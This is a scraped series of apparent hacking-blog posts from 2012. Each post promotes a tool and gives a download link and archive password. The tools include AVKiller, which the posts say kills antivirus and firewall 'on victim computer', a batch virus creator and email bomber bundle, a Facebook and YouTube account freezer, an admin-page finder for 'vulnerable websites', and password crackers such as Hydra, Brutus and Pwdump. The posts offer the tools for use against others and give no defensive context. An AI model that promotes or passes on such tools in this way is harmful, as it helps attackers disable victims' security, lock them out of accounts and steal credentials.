<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTLyay9hdb4qGF-NCuYVVn2F6LJpFaQCuO6As9VDf3WSFIyOp8MyzLQQIhgYIKaBxBxpnVPiPNUrygKNvQplIZhi5ypui1sIDexYWPRIVhY1jpBGOW87rUm_kwJ9YnV-lneumr-S8XLks/s1600-h/SoUi.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTLyay9hdb4qGF-NCuYVVn2F6LJpFaQCuO6As9VDf3WSFIyOp8MyzLQQIhgYIKaBxBxpnVPiPNUrygKNvQplIZhi5ypui1sIDexYWPRIVhY1jpBGOW87rUm_kwJ9YnV-lneumr-S8XLks/s320/SoUi.png" /></a></div>
<br />
<div style="font-family: Georgia,"Times New Roman",serif;">
<span style="font-size: small;">AVKiller is a software used to bypass firewall, antivirus and various security related software services on victim computer. Once the program is executed, AVKiller software will run in background and start killing all security related tasks on victim computer. These tasks include firewall, antivirus, windows defender and many other services. </span><br />
<br />
<span style="font-size: small;">Download here: </span><br />
<br />
<span style="font-size: small;"><a href="http://www.ziddu.com/download/6977842/Savk-Safe4.0.rar.html">http://www.ziddu.com/download/6977842/Savk-Safe4.0.rar.html</a> </span><br />
<br />
<span style="font-size: small;">Password: hackingguide</span></div>
<div style="clear: both;">
</div>
</div>
</div>13http://www.blogger.com/profile/08185313147597773374noreply@blogger.com0tag:blogger.com,1999:blog-3306689495812677983.post-82980522197586683322012-05-05T04:56:00.000-07:002012-12-20T08:49:54.122-08:00FAKE ERROR MESSAGE GENERATOR : MESSAGE MANAGER<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<h3 class="post-title">
</h3>
<div class="post-header-line-1">
</div>
<div class="post-body entry-content">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-1PdpQlhhRvDsxNMd6QcuxI-xyJRLCMUeoqoIMVNSpstx4qyLw_0wEjf3f9jdAE959NqMXQb5UqAnTsbCe2JTvhOhG6TOkgprJ4DK2FkNwDDk-nftw1yqKXGNaZNCUvlq42LvooDFaZI/s1600-h/fake-window-message-1110.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-1PdpQlhhRvDsxNMd6QcuxI-xyJRLCMUeoqoIMVNSpstx4qyLw_0wEjf3f9jdAE959NqMXQb5UqAnTsbCe2JTvhOhG6TOkgprJ4DK2FkNwDDk-nftw1yqKXGNaZNCUvlq42LvooDFaZI/s320/fake-window-message-1110.gif" /></a></div>
<br />
<div style="font-family: Georgia,"Times New Roman",serif;">
<span style="font-size: small;">Message Manager is a program which gives fake error messages whenever it is told to do so. You just have to input the text to be displayed in the error message and it will display unlimited number of fake error messages. </span><span style="font-size: small;"></span><br />
<br />
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: small;">Download here: </span><br />
<br />
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: small;"><a href="http://www.ziddu.com/download/7012065/ErrorMessage.rar.html">http://www.ziddu.com/download/7012065/ErrorMessage.rar.html</a> </span><br />
<br />
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: small;">Password: hackingguid</span>e<br />
<br />
<br />
<span style="font-family: 'Times New Roman'; text-align: justify;"> </span><span style="font-family: 'Times New Roman'; text-align: justify;">@Jasper Dekcah@</span></div>
<div style="clear: both;">
</div>
</div>
</div>
13http://www.blogger.com/profile/08185313147597773374noreply@blogger.com0tag:blogger.com,1999:blog-3306689495812677983.post-54914379453120322082012-05-05T04:55:00.001-07:002012-05-05T04:55:31.325-07:00SWISS ARMY KNIFE<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<h3 class="post-title">
<br /></h3>
<div class="post-header-line-1">
</div>
<div class="post-body entry-content">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgR_kXFyb9Ys_4MF7nSsVjJIYlJhTTfYiK4-cLlcjkT3iNKo5FJJZTNygh7TWEiK0sVEvYM2uCZdcDFZYhjocppOZOkaKVxDdTOYt_KkvUqIsIQJJHHrHm64vNB6Jr46jdGny_eEzcFHXQ/s1600-h/SwissArmyKnifeV3.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgR_kXFyb9Ys_4MF7nSsVjJIYlJhTTfYiK4-cLlcjkT3iNKo5FJJZTNygh7TWEiK0sVEvYM2uCZdcDFZYhjocppOZOkaKVxDdTOYt_KkvUqIsIQJJHHrHm64vNB6Jr46jdGny_eEzcFHXQ/s320/SwissArmyKnifeV3.jpg" /></a></div>
Swiss Army Knife is a multifunctional program which allows us to perform simple tasks of our computer like logoff, shutdown, opening Task Manager, internet explorer or firefox etc. It also has inbuilt hacking tools like Port Scanner, Email Bomber, Facebook Freezer, IM Spammer and also a Batch Virus creator.<br />
<br />
Download here:<br />
<br />
<a href="http://www.mediafire.com/download.php?mnyduzejtkn">http://www.mediafire.com/download.php?mnyduzejtkn</a>
<br />
<div style="clear: both;">
</div>
</div>
</div>13http://www.blogger.com/profile/08185313147597773374noreply@blogger.com0tag:blogger.com,1999:blog-3306689495812677983.post-19719310456259324772012-05-05T04:54:00.001-07:002012-12-20T08:53:02.222-08:00SMAC : THE MAC ADDRESS CHANGER<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<h3 class="post-title">
</h3>
<div class="post-header-line-1">
</div>
<div class="post-body entry-content">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhK3Bi2wxtPLSRv2v__47ZGCCP_-ayofrMVhxkfaXhI819wdoRA0Jz3pee7-Zx2nBgBGZ-1_nW_XNgbllxg2HJHncguAHaYt2EnL9IPJTmIdGSMzvp5w5FqyiuVtmT6Nc0LiMlYLB-KMI8/s1600/MAC+Address+Changer.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhK3Bi2wxtPLSRv2v__47ZGCCP_-ayofrMVhxkfaXhI819wdoRA0Jz3pee7-Zx2nBgBGZ-1_nW_XNgbllxg2HJHncguAHaYt2EnL9IPJTmIdGSMzvp5w5FqyiuVtmT6Nc0LiMlYLB-KMI8/s320/MAC+Address+Changer.jpg" /></a></div>
SMAC is a powerful and easy to use MAC Address Changer (Spoofer) for Windows systems, regardless of whether the network card manufacturers allow this option or not. Its features include:<br />
<ul>
<li>Automatically Activate new MAC Address after changing it</li>
<li>Show the manufacturer of the MAC Address </li>
<li>Randomly Generate any New MAC Address or based on a selected manufacturer</li>
<li>Pre-load MAC Addresses List and choose the new MAC address from the list.</li>
<li>IPConfig button - click to show network adapter (IPConfig) info to confirm changes</li>
<li>User-friendly GUI</li>
</ul>
Download here:<br />
<br />
<a href="http://www.mediafire.com/download.php?4djm2znbtmu">http://www.mediafire.com/download.php?4djm2znbtmu </a>
<br />
<br />
<span style="text-align: justify;"> </span><span style="text-align: justify;">@Jasper Dekcah@</span><br />
<div style="clear: both;">
</div>
</div>
</div>
13http://www.blogger.com/profile/08185313147597773374noreply@blogger.com0tag:blogger.com,1999:blog-3306689495812677983.post-48850787220186815562012-05-05T04:53:00.001-07:002012-05-05T04:53:58.882-07:00INVISIBLE SECRETS 2.1<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<h3 class="post-title">
<br /></h3>
<div class="post-header-line-1">
</div>
<div class="post-body entry-content">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjltB2jyX2OR0lEJQJisEES_mUxHsgjxdhvafNuYH7PHJe6b5pQ71nUTgJq1ZLpIG6I43bSpSVwHKRS3ZwXG0EG5-5Gu2s85RRjj8KjyoSmUq6cbZ4zOAuRybaWx8A7nVIlj03rb4jovzk/s1600/invsecr2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjltB2jyX2OR0lEJQJisEES_mUxHsgjxdhvafNuYH7PHJe6b5pQ71nUTgJq1ZLpIG6I43bSpSVwHKRS3ZwXG0EG5-5Gu2s85RRjj8KjyoSmUq6cbZ4zOAuRybaWx8A7nVIlj03rb4jovzk/s320/invsecr2.jpg" /></a></div>
With this program, you can hide/encrypt any file say a program, song, document etc in a carrier file (JPEG or BMP image) and send it to anyone secretly without exposing it to world and your friend or other person can decrypt it on other end using this software. You can also specify the password for encryption and decryption. The person on other end can only decrypt the file if he has this software and knows the encryption password. With this software, you can also:<br />
<ul>
<li>Delete carrier file after process</li>
<li>Add fake files to play pranks on friends </li>
<li>Add other carrier formats (.doc, .txt etc.) other than JPEG or BMP images which are default</li>
</ul>
Download here:<br />
<br />
<a href="http://www.mediafire.com/download.php?ogzmhzzzhhm">http://www.mediafire.com/download.php?ogzmhzzzhhm </a>
<br />
<div style="clear: both;">
</div>
</div>
</div>13http://www.blogger.com/profile/08185313147597773374noreply@blogger.com0tag:blogger.com,1999:blog-3306689495812677983.post-89582816131183473702012-05-05T04:52:00.003-07:002012-12-20T08:47:59.895-08:00WINRAR PASSWORD REMOVER<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<h3 class="post-title">
</h3>
<div class="post-header-line-1">
</div>
<div class="post-body entry-content">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjAP_05YifmCpQfe0PzO0-oGnsra69zGw4HJKQI9R3UAYW5brsLeeSdxlKJ7sxJ4VrB_lpCEKQ3Be8BDBe5PAI7jWg9vFqooUlpsgDlYgyv6PcQVdQHGQ5IyS_1WhMriMcDMgzi48ZMRU/s1600-h/Winrar_fs.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjAP_05YifmCpQfe0PzO0-oGnsra69zGw4HJKQI9R3UAYW5brsLeeSdxlKJ7sxJ4VrB_lpCEKQ3Be8BDBe5PAI7jWg9vFqooUlpsgDlYgyv6PcQVdQHGQ5IyS_1WhMriMcDMgzi48ZMRU/s320/Winrar_fs.jpg" /></a></div>
<br />
<div style="font-family: Georgia,"Times New Roman",serif;">
<span style="font-size: small;">Winrar Password makes use of its powerful bruteforce and dictionary attack to crack the passwords of Winrar archives.</span><br />
<br />
<span style="font-size: small;">Download here: </span><br />
<br />
<span style="font-size: small;"><a href="http://www.ziddu.com/download/6953416/WinRAR_Password_Remover.rar.html">http://www.ziddu.com/download/6953416/WinRAR_Password_Remover.rar.html</a> </span><br />
<br />
<span style="font-size: small;">Password: hackingguide</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"> </span><span style="font-family: 'Times New Roman'; text-align: justify;"> </span><span style="font-family: 'Times New Roman'; text-align: justify;">@Jasper Dekcah@</span></div>
<div style="clear: both;">
</div>
</div>
</div>
13http://www.blogger.com/profile/08185313147597773374noreply@blogger.com0tag:blogger.com,1999:blog-3306689495812677983.post-25504847123114429752012-05-05T04:52:00.001-07:002012-12-20T08:48:13.882-08:00REMOTE PASSWORD CRACKER : BRUTUS<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<h3 class="post-title">
</h3>
<div class="post-header-line-1">
</div>
<div class="post-body entry-content">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9XxOLnkDoYjhTGMRIzYVvRVy2gLJZDMM947qHrPf9YjeldfANg2Dlwlx8cC50OW4YeQuNAM9nrBkTUqH2EtJv11iubUi0Gv2xNrhosNnu2aOqAzXGuBzr9kzGcOdBZKIRoMKSUE7qcN8/s1600-h/brutus.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9XxOLnkDoYjhTGMRIzYVvRVy2gLJZDMM947qHrPf9YjeldfANg2Dlwlx8cC50OW4YeQuNAM9nrBkTUqH2EtJv11iubUi0Gv2xNrhosNnu2aOqAzXGuBzr9kzGcOdBZKIRoMKSUE7qcN8/s320/brutus.jpg" /></a></div>
<br />
<br />
<div style="font-family: Georgia,"Times New Roman",serif;">
<div style="font-family: Georgia,"Times New Roman",serif;">
<span style="font-size: small;">Brutus is one of the fastest, most flexible remote password crackers which simply implements bruteforcing attack. It has many options and is widely used as a password cracking software. </span></div>
<div style="font-family: Georgia,"Times New Roman",serif;">
<br /></div>
<div style="font-family: Georgia,"Times New Roman",serif;">
<span style="font-size: small;">Download here:</span><span style="font-size: small;"> </span></div>
<div style="font-family: Georgia,"Times New Roman",serif;">
<br /></div>
<div style="font-family: Georgia,"Times New Roman",serif;">
<span style="font-size: small;"><a href="http://www.ziddu.com/download/7008319/brutus-aet2.zip.html">http://www.ziddu.com/download/7008319/brutus-aet2.zip.html</a> </span></div>
<div style="font-family: Georgia,"Times New Roman",serif;">
<br /></div>
<span style="font-family: Arial, Arial, Helvetica;"><span style="font-size: x-small;"><span style="font-size: x-small;"><span style="font-family: Georgia, 'Times New Roman', serif; font-size: small;"><span style="font-family: Georgia, 'Times New Roman', serif;">Password: hackingguide </span><br />
</span></span></span></span><br />
<span style="font-family: Arial, Arial, Helvetica;"><span style="font-size: x-small;"><span style="font-size: x-small;"><span style="font-family: Georgia, 'Times New Roman', serif; font-size: small;"><span style="font-family: Georgia, 'Times New Roman', serif;"><br /></span></span></span></span></span>
<span style="font-family: Arial, Arial, Helvetica;"><span style="font-size: x-small;"><span style="font-size: x-small;"><span style="font-family: Georgia, 'Times New Roman', serif; font-size: small;"><span style="font-family: Georgia, 'Times New Roman', serif;"> </span></span></span></span></span><span style="font-family: 'Times New Roman'; text-align: justify;"> </span><span style="font-family: 'Times New Roman'; text-align: justify;">@Jasper Dekcah@</span></div>
<div style="clear: both;">
</div>
</div>
</div>
13http://www.blogger.com/profile/08185313147597773374noreply@blogger.com0tag:blogger.com,1999:blog-3306689495812677983.post-14978861219954882012-05-05T04:51:00.001-07:002012-05-05T04:51:28.899-07:00PASSWORD CRACKING TOOL : JOHN THE RIPPER<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<h3 class="post-title">
<br /></h3>
<div class="post-header-line-1">
</div>
<div class="post-body entry-content">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjWBv4mUfQXYma-Ep1ChasOX2DF-ToWMF21iE1CusZm565QwRZkQGXaTE1uavBDHOCHkOKxWAakgYae55aydC6CJZq-43M2OVlSDIAVKzYoW5drOagUvWj7oILSZsSWh1JntcTl1NG33lA/s1600-h/40_big.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjWBv4mUfQXYma-Ep1ChasOX2DF-ToWMF21iE1CusZm565QwRZkQGXaTE1uavBDHOCHkOKxWAakgYae55aydC6CJZq-43M2OVlSDIAVKzYoW5drOagUvWj7oILSZsSWh1JntcTl1NG33lA/s320/40_big.png" /></a></div>
John the Ripper is a fast password cracker, currently available for many flavors of Unix (11 are officially supported, not counting different architectures), DOS, Win32, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. It supports several crypt(3) password hash types which are most commonly found on various Unix flavors, as well as Kerberos AFS and Windows NT/2000/XP LM hashes. <br />
<br />
Download here (Windows Users):<br />
<br />
<a href="http://www.megaupload.com/?d=1K8X0B79">http://www.megaupload.com/?d=1K8X0B79 </a><br />
<br />
Download here (Linux Users):<br />
<br />
<a href="http://www.megaupload.com/?d=XI64DF6R">http://www.megaupload.com/?d=XI64DF6R </a>
<br />
<div style="clear: both;">
</div>
</div>
</div>13http://www.blogger.com/profile/08185313147597773374noreply@blogger.com0tag:blogger.com,1999:blog-3306689495812677983.post-74805741737366026512012-05-05T04:50:00.003-07:002012-05-05T04:50:55.300-07:00PASSWORD RECOVERY TOOL : PWDUMP<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<h3 class="post-title">
<br /></h3>
<div class="post-header-line-1">
</div>
<div class="post-body entry-content">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCR62TEoOcdnBTlcjzBIkwN1OmzWJ887mcvV_XsaWL0Ds9S9wLjsnwiGmovJdSG5HfN1yh6-UBRxnjrOIUj4CsrMRtdFgucLyfzFT5B35JILLC0ZHKsO_v-i1nPsGqrX98fmBq61Bk764/s1600-h/1442496096_a6c5e88965.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCR62TEoOcdnBTlcjzBIkwN1OmzWJ887mcvV_XsaWL0Ds9S9wLjsnwiGmovJdSG5HfN1yh6-UBRxnjrOIUj4CsrMRtdFgucLyfzFT5B35JILLC0ZHKsO_v-i1nPsGqrX98fmBq61Bk764/s320/1442496096_a6c5e88965.jpg" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
Pwdump is able to extract NTLM and LanMan hashes from a Windows target, regardless of whether Syskey is enabled. It is also capable of displaying password histories if they are available. It outputs the data in L0phtcrack-compatible form, and can write to an output file.<br />
<br />
Download here (Windows Users):<br />
<br />
<a href="http://www.megaupload.com/?d=VXQLJB9A">http://www.megaupload.com/?d=VXQLJB9A </a><br />
<br />
Download here (Linux Users):<br />
<br />
<a href="http://www.megaupload.com/?d=COHDJ0VQ">http://www.megaupload.com/?d=COHDJ0VQ </a>
<br />
<div style="clear: both;">
</div>
</div>
</div>13http://www.blogger.com/profile/08185313147597773374noreply@blogger.com0tag:blogger.com,1999:blog-3306689495812677983.post-15691102361731188652012-05-05T04:50:00.001-07:002012-05-05T04:50:07.926-07:00PASSWORD CRACKING TOOL : THC HYDRA<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<h3 class="post-title">
<br /></h3>
<div class="post-header-line-1">
</div>
<div class="post-body entry-content">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1sXB-F39-CzTI7vspiUTaNLn79Ns9ZicicZ1EKiHkKW3gMcjlP_lFIfOYTsoPFoToRmNB-2Qvv-sZ0S0I-31iB4UByLvlZGBFJNA9ssZVMisgLIf__a_ZD7DWef2lK1iyMai5e65DDXA/s1600-h/hydra1xg7.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1sXB-F39-CzTI7vspiUTaNLn79Ns9ZicicZ1EKiHkKW3gMcjlP_lFIfOYTsoPFoToRmNB-2Qvv-sZ0S0I-31iB4UByLvlZGBFJNA9ssZVMisgLIf__a_ZD7DWef2lK1iyMai5e65DDXA/s320/hydra1xg7.gif" /></a></div>
THC HYDRA is a fast network authentication cracker which supports many different services. When you need to brute force crack a remote authentication service, Hydra is often the tool of choice. It can perform rapid dictionary attacks against more then 30 protocols, including telnet, ftp, http, https, smb, several databases, and much more.<br />
<br />
Download here (Windows Users):<br />
<br />
<a href="http://www.megaupload.com/?d=C6IH4AC4">http://www.megaupload.com/?d=C6IH4AC4 </a><br />
<br />
Download here (Linux Users):<br />
<br />
<a href="http://www.megaupload.com/?d=8F0PZL8N">http://www.megaupload.com/?d=8F0PZL8N</a>
<br />
<div style="clear: both;">
</div>
</div>
</div>13http://www.blogger.com/profile/08185313147597773374noreply@blogger.com0tag:blogger.com,1999:blog-3306689495812677983.post-71993377826348505212012-05-05T04:49:00.000-07:002012-05-05T04:49:22.299-07:00WINDOWS PASSWORD RECOVERY TOOL : SAMINSIDE<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<h3 class="post-title">
<br /></h3>
<div class="post-header-line-1">
</div>
<div class="post-body entry-content">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHgpPnQmXvP-pcs2ZWbm5x0hjn6tUCP9Uc2yeUoRyi7pE52cQH5HO3SnuhKaqOmEF6QaoUyxc3VQEyL07Qvx177KVv0XUXXjUAUey41dyz3HVzxPj2F0mmvwVgg4BbT87OnAisMIuSuRY/s1600/saminside.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHgpPnQmXvP-pcs2ZWbm5x0hjn6tUCP9Uc2yeUoRyi7pE52cQH5HO3SnuhKaqOmEF6QaoUyxc3VQEyL07Qvx177KVv0XUXXjUAUey41dyz3HVzxPj2F0mmvwVgg4BbT87OnAisMIuSuRY/s320/saminside.jpg" /></a></div>
SAMInside recovers Windows NT/2000/XP/2003/Vista user passwords by implementing following types of password attack:<br />
<ul>
<li>Brute-force attack</li>
<li>Distributed attack </li>
<li>Mask attack </li>
<li>Dictionary attack </li>
<li>Hybrid attack </li>
<li>Pre-calculated tables attack </li>
</ul>
It includes various types of data imports like LM/NT Hashes, PWDump, LC, LST etc.<br />
<br />
Download here:<br />
<br />
<a href="http://www.mediafire.com/download.php?5mdigznwlzm">http://www.mediafire.com/download.php?5mdigznwlzm</a>
<br />
<div style="clear: both;">
</div>
</div>
</div>13http://www.blogger.com/profile/08185313147597773374noreply@blogger.com0tag:blogger.com,1999:blog-3306689495812677983.post-67886890814449405632012-05-05T04:47:00.002-07:002012-05-05T04:47:59.857-07:00VULNERABILITY SCANNER : X-SCAN<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<h3 class="post-title">
<br /></h3>
<div class="post-header-line-1">
</div>
<div class="post-body entry-content">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiec9Z65wrC645mErqvC-t887GlBs9NYgvyLCg8Za_hOsNZYUj7S4bIKmHGEd54BSHFndLfF3jqvjZlxbwRR68hbWtvY2fBgBXWCJNjVbVHUEGaj-3QVgEtkdVbpEGAPUoGqMZmjlInYcw/s1600-h/xScan.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiec9Z65wrC645mErqvC-t887GlBs9NYgvyLCg8Za_hOsNZYUj7S4bIKmHGEd54BSHFndLfF3jqvjZlxbwRR68hbWtvY2fBgBXWCJNjVbVHUEGaj-3QVgEtkdVbpEGAPUoGqMZmjlInYcw/s320/xScan.jpg" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br />
A multi-threaded, plug-in-supported vulnerability scanner. X-Scan includes many features, including full NASL support, detecting service types, remote OS type/version detection, weak user/password pairs, and more.<br />
<br />
Download here:<br />
<br />
<a href="http://www.megaupload.com/?d=AXULY3HF">http://www.megaupload.com/?d=AXULY3HF</a>
<br />
<div style="clear: both;">
</div>
</div>
</div>13http://www.blogger.com/profile/08185313147597773374noreply@blogger.com0tag:blogger.com,1999:blog-3306689495812677983.post-57487938814053382962012-05-05T04:47:00.000-07:002012-12-20T08:51:00.515-08:00WEBSITE HACKING SOFTWARE : ADMIN FINDER<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<br />
<h3 class="post-title">
</h3>
<div class="post-header-line-1">
</div>
<div class="post-body entry-content">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLw8YbQ3_T5JQKWGe-TX-iYSwx25cBGIwrA4mNoSvJ6uUFiO3SuUMigP2AHlqGAthYMFkr45DmA1UgIHPfxtT6DWMo_n4Xih9DoloCa-EYblzIAztV2r8pOxIA9WEXSbtupNURgT_qiSg/s1600-h/zjfh9d.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLw8YbQ3_T5JQKWGe-TX-iYSwx25cBGIwrA4mNoSvJ6uUFiO3SuUMigP2AHlqGAthYMFkr45DmA1UgIHPfxtT6DWMo_n4Xih9DoloCa-EYblzIAztV2r8pOxIA9WEXSbtupNURgT_qiSg/s320/zjfh9d.jpg" /></a></div>
<br />
<div style="font-family: Georgia,"Times New Roman",serif;">
<span style="font-size: small;">Admin Finder is a tool which scans the vulnerable websites for administrator login pages. It makes use of a predefined list for finding the admin login pages. After finding the pages, it may present you the page on which we can login with the administrator password. </span><br />
<br />
<span style="font-size: small;">Download here:</span><br />
<br />
<a href="http://www.ziddu.com/download/7040663/adminfinder.rar.html">http://www.ziddu.com/download/7040663/adminfinder.rar.html</a><span style="font-family: Georgia, 'Times New Roman', serif; font-size: small;"> </span><br />
<br />
<br />
<br />
<span style="font-family: 'Times New Roman'; text-align: justify;"> </span><span style="font-family: 'Times New Roman'; text-align: justify;">@Jasper Dekcah@</span><br />
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: small;">Password: hackingguide </span></div>
<div style="clear: both;">
</div>
</div>
</div>
13http://www.blogger.com/profile/08185313147597773374noreply@blogger.com0tag:blogger.com,1999:blog-3306689495812677983.post-76038735572546965312012-05-05T04:45:00.003-07:002012-12-20T08:53:16.002-08:00EMAIL ACCOUNT HACKING SOFTWARE : YOUTUBE/WINDOWS LIVE/FACEBOOK FREEZER<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<h3 class="post-title">
</h3>
<div class="post-header-line-1">
</div>
<div class="post-body entry-content">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiDIb0lL281ViqZvXRZznFMtx4nCT-0pGPuC0QCgGZMkW3UQYVLoFZQqwbU50h8QSHvvB3WbNgH8j3IdMAkGJnfK0XCEOJkcYIxVMTSSi7SldPXZqJHuCWGJ5kIRd4HXfe1xMPJZI_R-N4/s1600-h/icon_facebook.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiDIb0lL281ViqZvXRZznFMtx4nCT-0pGPuC0QCgGZMkW3UQYVLoFZQqwbU50h8QSHvvB3WbNgH8j3IdMAkGJnfK0XCEOJkcYIxVMTSSi7SldPXZqJHuCWGJ5kIRd4HXfe1xMPJZI_R-N4/s320/icon_facebook.png" /></a></div>
<div style="font-family: Georgia,"Times New Roman",serif;">
<span style="font-size: small;">This wonderful hacking program can freeze Youtube, Windows Live and Facebook accounts by use of repeated wrong login attempts. </span></div>
<div style="font-family: Georgia,"Times New Roman",serif;">
<span style="font-size: small;"><br />
</span><br />
<span style="font-size: small;">Download here </span><br />
<span style="font-size: small;"><br />
</span><br />
<span style="font-size: small;"><a href="http://www.ziddu.com/download/6949548/Youtube-WindowsLive-FacebookFreezer.rar.html">http://www.ziddu.com/download/6949548/Youtube-WindowsLive-FacebookFreezer.rar.html</a> </span><br />
<span style="font-size: small;"><br />
</span><br />
<span style="font-size: small;">Password: hackingguide</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"> </span><span style="font-family: 'Times New Roman'; text-align: justify;"> </span><span style="font-family: 'Times New Roman'; text-align: justify;">@Jasper Dekcah@</span></div>
<div style="clear: both;">
</div>
</div>
</div>
13http://www.blogger.com/profile/08185313147597773374noreply@blogger.com0